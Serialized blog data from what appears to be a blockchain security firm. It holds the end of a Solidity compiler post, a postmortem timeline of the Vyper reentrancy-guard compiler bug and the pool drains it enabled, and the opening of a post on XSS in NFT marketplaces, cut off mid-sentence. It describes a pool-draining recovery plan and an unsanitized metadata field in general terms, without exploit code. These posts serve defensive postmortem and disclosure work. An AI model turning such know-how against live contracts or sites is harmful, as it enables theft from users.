bodyCopier",{"type":28,"tag":116,"props":29959,"children":29960},{"style":266},[29961],{"type":33,"value":313},{"type":28,"tag":116,"props":29963,"children":29964},{"style":272},[29965],{"type":33,"value":29810},{"type":28,"tag":116,"props":29967,"children":29968},{"style":266},[29969],{"type":33,"value":141},{"type":28,"tag":116,"props":29971,"children":29972},{"style":282},[29973],{"type":33,"value":29974},"operations",{"type":28,"tag":116,"props":29976,"children":29977},{"style":266},[29978],{"type":33,"value":29979},"());`\n",{"type":28,"tag":455,"props":29981,"children":29982},{"start":256},[29983],{"type":28,"tag":459,"props":29984,"children":29985},{},[29986],{"type":33,"value":29987},"It would require a pretty contrived compiler implementation to meaningfully modify assembly statements before optimization.",{"type":28,"tag":29,"props":29989,"children":29990},{},[29991],{"type":33,"value":29992},"As long as the invariants are upheld before and after the assembly block executes, the code is probably safe.",{"type":28,"tag":63,"props":29994,"children":29995},{"id":4980},[29996],{"type":33,"value":4983},{"type":28,"tag":29,"props":29998,"children":29999},{},[30000],{"type":33,"value":30001},"In this blog post, we present an exploration of the Solidity compiler. This aims to serve as a useful reference for the inquisitive. Compilers are extremely complex with implicit and explicit assumptions. When in doubt, read the source code. So what exactly is memory safety?",{"type":28,"tag":29,"props":30003,"children":30004},{},[30005],{"type":33,"value":30006},"It's a promise between YUL generation and optimization.",{"type":28,"tag":18085,"props":30008,"children":30010},{"className":30009,"dataFootnotes":7},[18088],[30011,30016],{"type":28,"tag":63,"props":30012,"children":30014},{"className":30013,"id":15143},[18093],[30015],{"type":33,"value":18096},{"type":28,"tag":455,"props":30017,"children":30018},{},[30019,30053],{"type":28,"tag":459,"props":30020,"children":30022},{"id":30021},"user-content-fn-1",[30023,30025,30030,30032,30038,30040,30045,30047],{"type":33,"value":30024},"As an interesting aside, ",{"type":28,"tag":98,"props":30026,"children":30028},{"className":30027},[],[30029],{"type":33,"value":29026},{"type":33,"value":30031}," is an opaque function which prevents optimizations from reasoning about the free memory pointer. This leads to some rather counterintitive behavior -- ",{"type":28,"tag":98,"props":30033,"children":30035},{"className":30034},[],[30036],{"type":33,"value":30037},"memory-unsafe",{"type":33,"value":30039}," code can ",{"type":28,"tag":2583,"props":30041,"children":30042},{},[30043],{"type":33,"value":30044},"decrease",{"type":33,"value":30046}," gas consumption, especially in the YUL header. ",{"type":28,"tag":87,"props":30048,"children":30051},{"href":30049,"ariaLabel":18199,"className":30050,"dataFootnoteBackref":7},"#user-content-fnref-1",[18201],[30052],{"type":33,"value":18204},{"type":28,"tag":459,"props":30054,"children":30056},{"id":30055},"user-content-fn-2",[30057,30059,30064,30066],{"type":33,"value":30058},"Unfortunately the documentation only presents a \"non-exhaustive list of restrictions\" on verbatim bytecode. In practice, it seems hard to ",{"type":28,"tag":2583,"props":30060,"children":30061},{},[30062],{"type":33,"value":30063},"guarantee",{"type":33,"value":30065}," behavior with opaque bytes. ",{"type":28,"tag":87,"props":30067,"children":30070},{"href":30068,"ariaLabel":18219,"className":30069,"dataFootnoteBackref":7},"#user-content-fnref-2",[18201],[30071],{"type":33,"value":18204},{"type":28,"tag":2516,"props":30073,"children":30074},{},[30075],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":30077},[30078,30079,30080,30081,30082,30083,30084],{"id":28670,"depth":256,"text":28673},{"id":28724,"depth":256,"text":28727},{"id":28988,"depth":256,"text":28991},{"id":28719,"depth":256,"text":29212},{"id":29559,"depth":256,"text":29562},{"id":4980,"depth":256,"text":4983},{"id":15143,"depth":256,"text":18096},"content:blog:2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety",{"_path":30089,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":30090,"description":30091,"author":5391,"image":30092,"date":30094,"isFeatured":19,"onBlogPage":19,"tags":30095,"body":30097,"_type":2534,"_id":30848,"_source":2536,"_file":30849,"_stem":30850,"_extension":2539},"/blog/2023-08-01-vyper-timeline","Vyper Hack Timeline","A timeline and postmortem for the Vyper compiler bug. Thoughts on trust assumptions, vulnerability disclosures, and whitehack recoveries.",{"src":30093,"height":18,"width":18},"/posts/vyper-timeline/header.jpg","2023-08-01",[30096,28665],"vyper",{"type":25,"children":30098,"toc":30839},[30099,30104,30109,30114,30120,30125,30143,30153,30158,30166,30176,30195,30275,30285,30445,30450,30455,30465,30472,30477,30482,30496,30501,30518,30535,30554,30564,30577,30582,30595,30600,30605,30615,30642,30652,30682,30688,30697,30703,30708,30713,30718,30724,30729,30743,30748,30753,30758,30764,30769,30782,30808,30813,30835],{"type":28,"tag":29,"props":30100,"children":30101},{},[30102],{"type":33,"value":30103},"\"Trust but verify\" is a common adage. \"Hindsight is 20/20\" is another one. The best bugs are those hiding in plain sight.",{"type":28,"tag":29,"props":30105,"children":30106},{},[30107],{"type":33,"value":30108},"Compiler bugs are located deep in the supply chain, making their effects far more widespread than normal protocol bugs. Numerous contracts across different chains were compiled with vulnerable Vyper versions - it was a race against blackhats.",{"type":28,"tag":29,"props":30110,"children":30111},{},[30112],{"type":33,"value":30113},"Here's how it all happened.",{"type":28,"tag":63,"props":30115,"children":30117},{"id":30116},"timeline",[30118],{"type":33,"value":30119},"Timeline",{"type":28,"tag":29,"props":30121,"children":30122},{},[30123],{"type":33,"value":30124},"As a note, I'll use the \"we\" pronoun loosely here. I think I personally made some insightful contributions towards the initial vulnerability discovery but countless others helped far more throughout the entire process.",{"type":28,"tag":29,"props":30126,"children":30127},{},[30128,30133,30135,30142],{"type":28,"tag":4995,"props":30129,"children":30130},{},[30131],{"type":33,"value":30132},"13:10 UTC",{"type":33,"value":30134}," pETH/ETH was ",{"type":28,"tag":87,"props":30136,"children":30139},{"href":30137,"rel":30138},"https://etherscan.io/tx/0xa84aa065ce61dbb1eb50ab6ae67fc31a9da50dd2c74eefd561661bfce2f1620c",[91],[30140],{"type":33,"value":30141},"drained of $11M",{"type":33,"value":141},{"type":28,"tag":29,"props":30144,"children":30145},{},[30146,30151],{"type":28,"tag":4995,"props":30147,"children":30148},{},[30149],{"type":33,"value":30150},"13:19 UTC",{"type":33,"value":30152}," Michal posted in ETHSecurity about a sudden drop in pETH price.",{"type":28,"tag":29,"props":30154,"children":30155},{},[30156],{"type":33,"value":30157},"Igor first noticed something was off. Thanks to him, we dug deeper.",{"type":28,"tag":107,"props":30159,"children":30160},{},[30161],{"type":28,"tag":29,"props":30162,"children":30163},{},[30164],{"type":33,"value":30165},"But how did the bot reenter into add_liquidity() from remove_liquidity()?",{"type":28,"tag":29,"props":30167,"children":30168},{},[30169,30174],{"type":28,"tag":4995,"props":30170,"children":30171},{},[30172],{"type":33,"value":30173},"14:01 UTC",{"type":33,"value":30175}," A warroom was formed around this comment.",{"type":28,"tag":29,"props":30177,"children":30178},{},[30179,30184,30186,30193],{"type":28,"tag":4995,"props":30180,"children":30181},{},[30182],{"type":33,"value":30183},"14:07 UTC",{"type":33,"value":30185}," We decompiled the JPEGd contract ",{"type":28,"tag":87,"props":30187,"children":30190},{"href":30188,"rel":30189},"https://ethervm.io/decompile",[91],[30191],{"type":33,"value":30192},"with our favorite decompiler",{"type":33,"value":30194}," and noted a difference in reentrancy guard storage slot.",{"type":28,"tag":234,"props":30196,"children":30200},{"className":30197,"code":30198,"language":30199,"meta":7,"style":7},"language-yul shiki shiki-themes slack-dark","// Dispatch table entry for add_liquidity(uint256[2],uint256)\nlabel_0057:\n    if (storage[0x00]) { revert(memory[0x00:0x00]); }\n    storage[0x00] = 0x01;\n\n// Dispatch table entry for remove_liquidity(uint256,uint256[2])\nlabel_1AF3:\n    if (storage[0x02]) { revert(memory[0x00:0x00]); }\n    storage[0x02] = 0x01;\n","yul",[30201],{"type":28,"tag":98,"props":30202,"children":30203},{"__ignoreMap":7},[30204,30212,30220,30228,30236,30243,30251,30259,30267],{"type":28,"tag":116,"props":30205,"children":30206},{"class":245,"line":246},[30207],{"type":28,"tag":116,"props":30208,"children":30209},{},[30210],{"type":33,"value":30211},"// Dispatch table entry for add_liquidity(uint256[2],uint256)\n",{"type":28,"tag":116,"props":30213,"children":30214},{"class":245,"line":256},[30215],{"type":28,"tag":116,"props":30216,"children":30217},{},[30218],{"type":33,"value":30219},"label_0057:\n",{"type":28,"tag":116,"props":30221,"children":30222},{"class":245,"line":293},[30223],{"type":28,"tag":116,"props":30224,"children":30225},{},[30226],{"type":33,"value":30227},"    if (storage[0x00]) { revert(memory[0x00:0x00]); }\n",{"type":28,"tag":116,"props":30229,"children":30230},{"class":245,"line":361},[30231],{"type":28,"tag":116,"props":30232,"children":30233},{},[30234],{"type":33,"value":30235},"    storage[0x00] = 0x01;\n",{"type":28,"tag":116,"props":30237,"children":30238},{"class":245,"line":387},[30239],{"type":28,"tag":116,"props":30240,"children":30241},{"emptyLinePlaceholder":19},[30242],{"type":33,"value":1044},{"type":28,"tag":116,"props":30244,"children":30245},{"class":245,"line":400},[30246],{"type":28,"tag":116,"props":30247,"children":30248},{},[30249],{"type":33,"value":30250},"// Dispatch table entry for remove_liquidity(uint256,uint256[2])\n",{"type":28,"tag":116,"props":30252,"children":30253},{"class":245,"line":614},[30254],{"type":28,"tag":116,"props":30255,"children":30256},{},[30257],{"type":33,"value":30258},"label_1AF3:\n",{"type":28,"tag":116,"props":30260,"children":30261},{"class":245,"line":631},[30262],{"type":28,"tag":116,"props":30263,"children":30264},{},[30265],{"type":33,"value":30266},"    if (storage[0x02]) { revert(memory[0x00:0x00]); }\n",{"type":28,"tag":116,"props":30268,"children":30269},{"class":245,"line":665},[30270],{"type":28,"tag":116,"props":30271,"children":30272},{},[30273],{"type":33,"value":30274},"    storage[0x02] = 0x01;\n",{"type":28,"tag":29,"props":30276,"children":30277},{},[30278,30283],{"type":28,"tag":4995,"props":30279,"children":30280},{},[30281],{"type":33,"value":30282},"14:27 UTC",{"type":33,"value":30284}," We confirmed this behavior with a simple local test contract.",{"type":28,"tag":234,"props":30286,"children":30288},{"className":19125,"code":30287,"language":19124,"meta":7,"style":7},"@external\n@nonreentrant(\"lock\")\ndef test(addr: address) -> bool:\n    return True\n\n@external\n@nonreentrant(\"lock\")\ndef test2(addr: address) -> bool:\n    return False\n",[30289],{"type":28,"tag":98,"props":30290,"children":30291},{"__ignoreMap":7},[30292,30300,30321,30356,30368,30375,30382,30401,30433],{"type":28,"tag":116,"props":30293,"children":30294},{"class":245,"line":246},[30295],{"type":28,"tag":116,"props":30296,"children":30297},{"style":282},[30298],{"type":33,"value":30299},"@external\n",{"type":28,"tag":116,"props":30301,"children":30302},{"class":245,"line":256},[30303,30308,30312,30317],{"type":28,"tag":116,"props":30304,"children":30305},{"style":282},[30306],{"type":33,"value":30307},"@nonreentrant",{"type":28,"tag":116,"props":30309,"children":30310},{"style":266},[30311],{"type":33,"value":313},{"type":28,"tag":116,"props":30313,"children":30314},{"style":563},[30315],{"type":33,"value":30316},"\"lock\"",{"type":28,"tag":116,"props":30318,"children":30319},{"style":266},[30320],{"type":33,"value":2830},{"type":28,"tag":116,"props":30322,"children":30323},{"class":245,"line":293},[30324,30329,30334,30338,30343,30348,30352],{"type":28,"tag":116,"props":30325,"children":30326},{"style":376},[30327],{"type":33,"value":30328},"def",{"type":28,"tag":116,"props":30330,"children":30331},{"style":282},[30332],{"type":33,"value":30333}," test",{"type":28,"tag":116,"props":30335,"children":30336},{"style":266},[30337],{"type":33,"value":313},{"type":28,"tag":116,"props":30339,"children":30340},{"style":272},[30341],{"type":33,"value":30342},"addr",{"type":28,"tag":116,"props":30344,"children":30345},{"style":266},[30346],{"type":33,"value":30347},": address) -> ",{"type":28,"tag":116,"props":30349,"children":30350},{"style":339},[30351],{"type":33,"value":29341},{"type":28,"tag":116,"props":30353,"children":30354},{"style":266},[30355],{"type":33,"value":5239},{"type":28,"tag":116,"props":30357,"children":30358},{"class":245,"line":361},[30359,30363],{"type":28,"tag":116,"props":30360,"children":30361},{"style":260},[30362],{"type":33,"value":393},{"type":28,"tag":116,"props":30364,"children":30365},{"style":376},[30366],{"type":33,"value":30367}," True\n",{"type":28,"tag":116,"props":30369,"children":30370},{"class":245,"line":387},[30371],{"type":28,"tag":116,"props":30372,"children":30373},{"emptyLinePlaceholder":19},[30374],{"type":33,"value":1044},{"type":28,"tag":116,"props":30376,"children":30377},{"class":245,"line":400},[30378],{"type":28,"tag":116,"props":30379,"children":30380},{"style":282},[30381],{"type":33,"value":30299},{"type":28,"tag":116,"props":30383,"children":30384},{"class":245,"line":614},[30385,30389,30393,30397],{"type":28,"tag":116,"props":30386,"children":30387},{"style":282},[30388],{"type":33,"value":30307},{"type":28,"tag":116,"props":30390,"children":30391},{"style":266},[30392],{"type":33,"value":313},{"type":28,"tag":116,"props":30394,"children":30395},{"style":563},[30396],{"type":33,"value":30316},{"type":28,"tag":116,"props":30398,"children":30399},{"style":266},[30400],{"type":33,"value":2830},{"type":28,"tag":116,"props":30402,"children":30403},{"class":245,"line":631},[30404,30408,30413,30417,30421,30425,30429],{"type":28,"tag":116,"props":30405,"children":30406},{"style":376},[30407],{"type":33,"value":30328},{"type":28,"tag":116,"props":30409,"children":30410},{"style":282},[30411],{"type":33,"value":30412}," test2",{"type":28,"tag":116,"props":30414,"children":30415},{"style":266},[30416],{"type":33,"value":313},{"type":28,"tag":116,"props":30418,"children":30419},{"style":272},[30420],{"type":33,"value":30342},{"type":28,"tag":116,"props":30422,"children":30423},{"style":266},[30424],{"type":33,"value":30347},{"type":28,"tag":116,"props":30426,"children":30427},{"style":339},[30428],{"type":33,"value":29341},{"type":28,"tag":116,"props":30430,"children":30431},{"style":266},[30432],{"type":33,"value":5239},{"type":28,"tag":116,"props":30434,"children":30435},{"class":245,"line":665},[30436,30440],{"type":28,"tag":116,"props":30437,"children":30438},{"style":260},[30439],{"type":33,"value":393},{"type":28,"tag":116,"props":30441,"children":30442},{"style":376},[30443],{"type":33,"value":30444}," False\n",{"type":28,"tag":29,"props":30446,"children":30447},{},[30448],{"type":33,"value":30449},"This was not just another reentrancy bug.",{"type":28,"tag":29,"props":30451,"children":30452},{},[30453],{"type":33,"value":30454},"At this point, we realized just how impactful this would be. There was a blackout of information, and we deleted public messages on the nature of the vulnerability.",{"type":28,"tag":29,"props":30456,"children":30457},{},[30458,30463],{"type":28,"tag":4995,"props":30459,"children":30460},{},[30461],{"type":33,"value":30462},"14:37 UTC",{"type":33,"value":30464}," Wavey helped identify the vulnerable commit and affected versions. This was also confirmed by me and Charles by manually inspecting the Vyper compiler output.",{"type":28,"tag":29,"props":30466,"children":30467},{},[30468],{"type":28,"tag":206,"props":30469,"children":30471},{"alt":7,"src":30470},"/posts/vyper-timeline/sstore.png",[],{"type":28,"tag":29,"props":30473,"children":30474},{},[30475],{"type":33,"value":30476},"It was a race with the hackers.",{"type":28,"tag":29,"props":30478,"children":30479},{},[30480],{"type":33,"value":30481},"Thankfully, people were still confusing this for read-only reentrancy. Taken from the \"Web3 Security Alerts\" channel.",{"type":28,"tag":107,"props":30483,"children":30484},{},[30485],{"type":28,"tag":29,"props":30486,"children":30487},{},[30488,30490],{"type":33,"value":30489},"Alchemix and Metronome DAO also been hacked due to this read-only reentrancy bug: ",{"type":28,"tag":87,"props":30491,"children":30494},{"href":30492,"rel":30493},"https://twitter.com/hexagate_/status/1685677801813217280",[91],[30495],{"type":33,"value":30492},{"type":28,"tag":29,"props":30497,"children":30498},{},[30499],{"type":33,"value":30500},"Michael identified alETH and msETH pools, which were also running 0.2.15, as being also potentially vulnerable.",{"type":28,"tag":29,"props":30502,"children":30503},{},[30504,30509,30510,30517],{"type":28,"tag":4995,"props":30505,"children":30506},{},[30507],{"type":33,"value":30508},"14:50 UTC",{"type":33,"value":6129},{"type":28,"tag":87,"props":30511,"children":30514},{"href":30512,"rel":30513},"https://etherscan.io/tx/0xc93eb238ff42632525e990119d3edc7775299a70b56e54d83ec4f53736400964",[91],[30515],{"type":33,"value":30516},"msETH/ETH was drained",{"type":33,"value":141},{"type":28,"tag":29,"props":30519,"children":30520},{},[30521,30526,30527,30534],{"type":28,"tag":4995,"props":30522,"children":30523},{},[30524],{"type":33,"value":30525},"15:34 UTC",{"type":33,"value":6129},{"type":28,"tag":87,"props":30528,"children":30531},{"href":30529,"rel":30530},"https://etherscan.io/tx/0xb676d789bb8b66a08105c844a49c2bcffb400e5c1cfabd4bc30cca4bff3c9801",[91],[30532],{"type":33,"value":30533},"alETH/ETH was drained",{"type":33,"value":141},{"type":28,"tag":29,"props":30536,"children":30537},{},[30538,30543,30545,30552],{"type":28,"tag":4995,"props":30539,"children":30540},{},[30541],{"type":33,"value":30542},"15:43 UTC",{"type":33,"value":30544}," We identified that ",{"type":28,"tag":87,"props":30546,"children":30549},{"href":30547,"rel":30548},"https://etherscan.io/address/0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511#code",[91],[30550],{"type":33,"value":30551},"CRV/ETH was vulnerable",{"type":33,"value":30553},", compiled using Vyper version 3.0.0. It was critical that we kept the nature of affected contracts secret for as long as possible.",{"type":28,"tag":29,"props":30555,"children":30556},{},[30557,30562],{"type":28,"tag":4995,"props":30558,"children":30559},{},[30560],{"type":33,"value":30561},"16:11 UTC",{"type":33,"value":30563}," We began working on a whitehat exploit.",{"type":28,"tag":29,"props":30565,"children":30566},{},[30567,30569,30576],{"type":33,"value":30568},"Unfortunately, too many groups were doing independent research in parallel and rumors were spreading. At 16:44 UTC, we decided to release a ",{"type":28,"tag":87,"props":30570,"children":30573},{"href":30571,"rel":30572},"https://twitter.com/vyperlang/status/1685692973051498497",[91],[30574],{"type":33,"value":30575},"public statement on affected versions",{"type":33,"value":141},{"type":28,"tag":29,"props":30578,"children":30579},{},[30580],{"type":33,"value":30581},"By 18:32 UTC, we had a proof of concept exploit to be used in a potential whitehat recovery. bpak from Chainlight was also working on an exploit in parallel, and shared it at 19:06 UTC.",{"type":28,"tag":29,"props":30583,"children":30584},{},[30585,30587,30594],{"type":33,"value":30586},"Five minutes later at 19:11 UTC, ",{"type":28,"tag":87,"props":30588,"children":30591},{"href":30589,"rel":30590},"https://etherscan.io/tx/0x2e7dc8b2fb7e25fd00ed9565dcc0ad4546363171d5e00f196d48103983ae477c",[91],[30592],{"type":33,"value":30593},"somebody else stole the funds",{"type":33,"value":141},{"type":28,"tag":29,"props":30596,"children":30597},{},[30598],{"type":33,"value":30599},"The attack structure was largely different from either of our proofs of concept, so it was unlikely to have been a leak from our group. Regardless, this was pretty demoralizing.",{"type":28,"tag":29,"props":30601,"children":30602},{},[30603],{"type":33,"value":30604},"Nevertheless, there was more ground to cover.",{"type":28,"tag":29,"props":30606,"children":30607},{},[30608,30613],{"type":28,"tag":4995,"props":30609,"children":30610},{},[30611],{"type":33,"value":30612},"21:26 UTC",{"type":33,"value":30614}," Addison proposed an ambitious plan to recover the remaining assets in the CRVETH pool.",{"type":28,"tag":107,"props":30616,"children":30617},{},[30618],{"type":28,"tag":29,"props":30619,"children":30620},{},[30621,30623,30627,30629,30632,30634,30637,30639],{"type":33,"value":30622},"if you send like 30k crv to the crv/eth pool ",{"type":28,"tag":30624,"props":30625,"children":30626},"br",{},[],{"type":33,"value":30628},"\nyou can then update admin fee ",{"type":28,"tag":30624,"props":30630,"children":30631},{},[],{"type":33,"value":30633},"\nand then the crv/eth rate is like .15 eth per crv ",{"type":28,"tag":30624,"props":30635,"children":30636},{},[],{"type":33,"value":30638},"\nso you can basically drain whole pool for few hundred K crv ",{"type":28,"tag":30624,"props":30640,"children":30641},{},[],{"type":28,"tag":29,"props":30643,"children":30644},{},[30645,30650],{"type":28,"tag":4995,"props":30646,"children":30647},{},[30648],{"type":33,"value":30649},"21:52 UTC",{"type":33,"value":30651}," bpak had produced a working proof of concept which could recover 3100 ETH.",{"type":28,"tag":29,"props":30653,"children":30654},{},[30655,30657,30664,30666,30673,30681],{"type":33,"value":30656},"Ten minutes later at 22:02 UTC, we were beaten again. By some freak concidence, the ",{"type":28,"tag":87,"props":30658,"children":30661},{"href":30659,"rel":30660},"https://etherscan.io/address/0x8c73d39b2da2dd1a10cc16502bc7c8d768ec74c9",[91],[30662],{"type":33,"value":30663},"CRV admin fee bot",{"type":33,"value":30665}," had claimed fees and ",{"type":28,"tag":87,"props":30667,"children":30670},{"href":30668,"rel":30669},"https://etherscan.io/tx/0xcd99fadd7e28a42a063e07d9d86f67c88e10a7afe5921bd28cd1124924ae2052",[91],[30671],{"type":33,"value":30672},"the pool was drained",{"type":28,"tag":15136,"props":30674,"children":30675},{},[30676],{"type":28,"tag":87,"props":30677,"children":30679},{"href":29279,"ariaDescribedBy":30678,"dataFootnoteRef":7,"id":29281},[15143],[30680],{"type":33,"value":1824},{"type":33,"value":141},{"type":28,"tag":63,"props":30683,"children":30685},{"id":30684},"blame",[30686],{"type":33,"value":30687},"Blame",{"type":28,"tag":29,"props":30689,"children":30690},{},[30691,30695],{"type":28,"tag":2583,"props":30692,"children":30693},{},[30694],{"type":33,"value":30687},{"type":33,"value":30696}," is a strong word. It's not productive to point fingers. At the same time, I think it's useful to think about what could have went better.",{"type":28,"tag":75,"props":30698,"children":30700},{"id":30699},"races",[30701],{"type":33,"value":30702},"Races",{"type":28,"tag":29,"props":30704,"children":30705},{},[30706],{"type":33,"value":30707},"In both cases, whitehat efforts were beaten by less than half an hour. Sometimes every second really does count.",{"type":28,"tag":29,"props":30709,"children":30710},{},[30711],{"type":33,"value":30712},"There likely could have been better preparation and resources for executing on these attacks. At the same time, this seems like a double-edged sword. Is it really a good idea to aggregate information related how to execute a hack? Who should we trust?",{"type":28,"tag":29,"props":30714,"children":30715},{},[30716],{"type":33,"value":30717},"On the other hand, I think the process was quite efficient. We went from initial suspicions to identifying vulnerable variants in 2 hours and 4 minutes.",{"type":28,"tag":75,"props":30719,"children":30721},{"id":30720},"information-leakage",[30722],{"type":33,"value":30723},"Information Leakage",{"type":28,"tag":29,"props":30725,"children":30726},{},[30727],{"type":33,"value":30728},"I was both an auditor and a whitehat.",{"type":28,"tag":29,"props":30730,"children":30731},{},[30732,30734,30741],{"type":33,"value":30733},"There's a strong culture of publishing in auditing. We're paid for technical thought leadership and deep understanding of vulnerabilities. One way to demonstrate this is ",{"type":28,"tag":87,"props":30735,"children":30738},{"href":30736,"rel":30737},"https://twitter.com/osec_io/status/1579969927020412929",[91],[30739],{"type":33,"value":30740},"by publishing the \"scoop\"",{"type":33,"value":30742}," on hacks in the wild. Researchers cost a lot and the return on investment is publicity.",{"type":28,"tag":29,"props":30744,"children":30745},{},[30746],{"type":33,"value":30747},"On the other hand, there's a compelling argument that early disclosure of the affected versions had a material impact on the whitehat recovery.",{"type":28,"tag":29,"props":30749,"children":30750},{},[30751],{"type":33,"value":30752},"Half an hour more could have saved $18M.",{"type":28,"tag":29,"props":30754,"children":30755},{},[30756],{"type":33,"value":30757},"Auditors don't pay for externalities created by their reporting. Instead, they get rewarded with likes, retweets, and publicity. Seems like a hard problem.",{"type":28,"tag":63,"props":30759,"children":30761},{"id":30760},"next-steps",[30762],{"type":33,"value":30763},"Next Steps",{"type":28,"tag":29,"props":30765,"children":30766},{},[30767],{"type":33,"value":30768},"I disagree with takes like \"we need formal verification to solve this\". This bug could have been caught with a unit test. Formal verification is very useful for many bug classes, but I'm not convinced it's as useful for relatively simple, non-optimizing compilers.",{"type":28,"tag":29,"props":30770,"children":30771},{},[30772,30774,30781],{"type":33,"value":30773},"It's important to note that this bug ",{"type":28,"tag":87,"props":30775,"children":30778},{"href":30776,"rel":30777},"https://twitter.com/real_philogy/status/1685948253139857409",[91],[30779],{"type":33,"value":30780},"was patched since November 2021",{"type":33,"value":141},{"type":28,"tag":107,"props":30783,"children":30784},{},[30785],{"type":28,"tag":29,"props":30786,"children":30787},{},[30788,30790,30795,30796,30799,30801,30806],{"type":33,"value":30789},"I think this Vyper 0day is less about the skill of the Vyper team or the language itself but more about ",{"type":28,"tag":2583,"props":30791,"children":30792},{},[30793],{"type":33,"value":30794},"processes",{"type":33,"value":18195},{"type":28,"tag":30624,"props":30797,"children":30798},{},[],{"type":33,"value":30800},"\nThe bug was a fixed many versions of Vyper ago, the actual oversight was not realizing the potential impact to projects at the time it ",{"type":28,"tag":2583,"props":30802,"children":30803},{},[30804],{"type":33,"value":30805},"was",{"type":33,"value":30807}," fixed.",{"type":28,"tag":29,"props":30809,"children":30810},{},[30811],{"type":33,"value":30812},"Unfortunately, public goods get easily forgotten. With immutable contracts, projects can have implicit dependencies on code written years ago. Protocol developers and security experts should stay up to date on security developments across the entire execution stack.",{"type":28,"tag":18085,"props":30814,"children":30816},{"className":30815,"dataFootnotes":7},[18088],[30817,30822],{"type":28,"tag":63,"props":30818,"children":30820},{"className":30819,"id":15143},[18093],[30821],{"type":33,"value":18096},{"type":28,"tag":455,"props":30823,"children":30824},{},[30825],{"type":28,"tag":459,"props":30826,"children":30827},{"id":30021},[30828,30830],{"type":33,"value":30829},"Thankfully, these funds were later returned. ",{"type":28,"tag":87,"props":30831,"children":30833},{"href":30049,"ariaLabel":18199,"className":30832,"dataFootnoteBackref":7},[18201],[30834],{"type":33,"value":18204},{"type":28,"tag":2516,"props":30836,"children":30837},{},[30838],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":30840},[30841,30842,30846,30847],{"id":30116,"depth":256,"text":30119},{"id":30684,"depth":256,"text":30687,"children":30843},[30844,30845],{"id":30699,"depth":293,"text":30702},{"id":30720,"depth":293,"text":30723},{"id":30760,"depth":256,"text":30763},{"id":15143,"depth":256,"text":18096},"content:blog:2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline",{"_path":30852,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":30853,"description":30854,"author":30855,"image":30856,"date":30858,"isFeatured":19,"tags":30859,"onBlogPage":19,"body":30862,"_type":2534,"_id":35044,"_source":2536,"_file":35045,"_stem":35046,"_extension":2539},"/blog/2023-08-11-web2-bug-repellant-instructions","Web2 Bug Repellant Instructions","An analysis of security risks that don’t get enough attention - web2 bugs in web3 apps. We take a deep and practical look at vulnerabilities across various applications.",[13,12],{"src":30857,"height":18,"width":18},"/posts/web2-bug-repellant-instructions/web2-bug-repellant-instructions.jpg","2023-08-11",[30860,30861],"nft-marketplaces","xss",{"type":25,"children":30863,"toc":35027},[30864,30868,30873,30877,30882,30887,30892,30908,30914,30927,30949,30956,30961,30968,30973,30979,30984,30989,30994,30999,31008,31013,31977,31987,31999,32006,32011,32819,32824,32829,32834,32839,33623,33628,33710,33715,33782,33788,33793,33798,34022,34035,34040,34045,34050,34057,34062,34069,34075,34080,34085,34090,34408,34413,34419,34435,34441,34446,34451,34460,34465,34470,34479,34484,34490,34506,34519,34524,34529,34549,34556,34561,34568,34577,34582,34602,34655,34660,34711,34725,34730,34743,34858,34881,34965,34988,34993,34998,35002,35007,35012,35018,35023],{"type":28,"tag":63,"props":30865,"children":30866},{"id":28670},[30867],{"type":33,"value":28673},{"type":28,"tag":29,"props":30869,"children":30870},{},[30871],{"type":33,"value":30872},"Transitioning to a fully decentralized web is hard. Many Web 3 applications still have large, unexplored Web 2 attack surfaces.",{"type":28,"tag":75,"props":30874,"children":30875},{"id":2590},[30876],{"type":33,"value":2593},{"type":28,"tag":29,"props":30878,"children":30879},{},[30880],{"type":33,"value":30881},"In this blog post, we'll explore these lingering threats and potential mitigations. This work summarizes our internal research against various applications, from NFT marketplaces to wallets to protocol frontends.",{"type":28,"tag":29,"props":30883,"children":30884},{},[30885],{"type":33,"value":30886},"As a note, generally applications with non-trivial frontends are more susceptible to these vulnerabilities. Hence, a lot of our research focused on the interactions with NFTs, an ideal Web 2.5 candidate in many senses.",{"type":28,"tag":63,"props":30888,"children":30889},{"id":30861},[30890],{"type":33,"value":30891},"XSS",{"type":28,"tag":29,"props":30893,"children":30894},{},[30895],{"type":28,"tag":2583,"props":30896,"children":30897},{},[30898,30900,30907],{"type":33,"value":30899},"I cannot make you understand. I cannot make anyone understand what is happening inside me. I cannot ",{"type":28,"tag":87,"props":30901,"children":30904},{"href":30902,"rel":30903},"https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting",[91],[30905],{"type":33,"value":30906},"even explain it to myself",{"type":33,"value":141},{"type":28,"tag":75,"props":30909,"children":30911},{"id":30910},"managing-metadata",[30912],{"type":33,"value":30913},"Managing Metadata",{"type":28,"tag":29,"props":30915,"children":30916},{},[30917,30919,30926],{"type":33,"value":30918},"Effectively managing metadata is a challenge. When improperly sanitized, unsuspecting metadata becomes a dangerous sink for malicious ",{"type":28,"tag":87,"props":30920,"children":30923},{"href":30921,"rel":30922},"https://www.vice.com/en/article/xgdvaz/nft-steal-ip-address-opensea",[91],[30924],{"type":33,"value":30925},"payloads",{"type":33,"value":141},{"type":28,"tag":29,"props":30928,"children":30929},{},[30930,30932,30939,30941,30947],{"type":33,"value":30931},"We showcase this vulnerability in the ",{"type":28,"tag":87,"props":30933,"children":30936},{"href":30934,"rel":30935},"https://rocki.com/",[91],[30937],{"type":33,"value":30938},"Rocki Marketplace",{"type":33,"value":30940},". The ",{"type":28,"tag":98,"props":30942,"children":30944},{"className":30943},[],[30945],{"type":33,"value":30946},"artistDescription",{"type":33,"value":30948}," parameter was improperly sanitized, allowing arbitrary HTML input without any validation checks!",{"type":28,"tag":29,"props":30950,"children":30951},{},[30952],{"type":28,"tag":206,"props":30953,"children":30955},{"alt":7,"src":30954},"/posts/web2-bug-repellant-instructions/metadata.png",[],{"type":28,"tag":29,"props":30957,"children":30958},{},[30959],{"type":33,"value":30960},"When a user loads such a maliciously constructed NFT, they'll unwittingly execute our payload, giving us full control over their 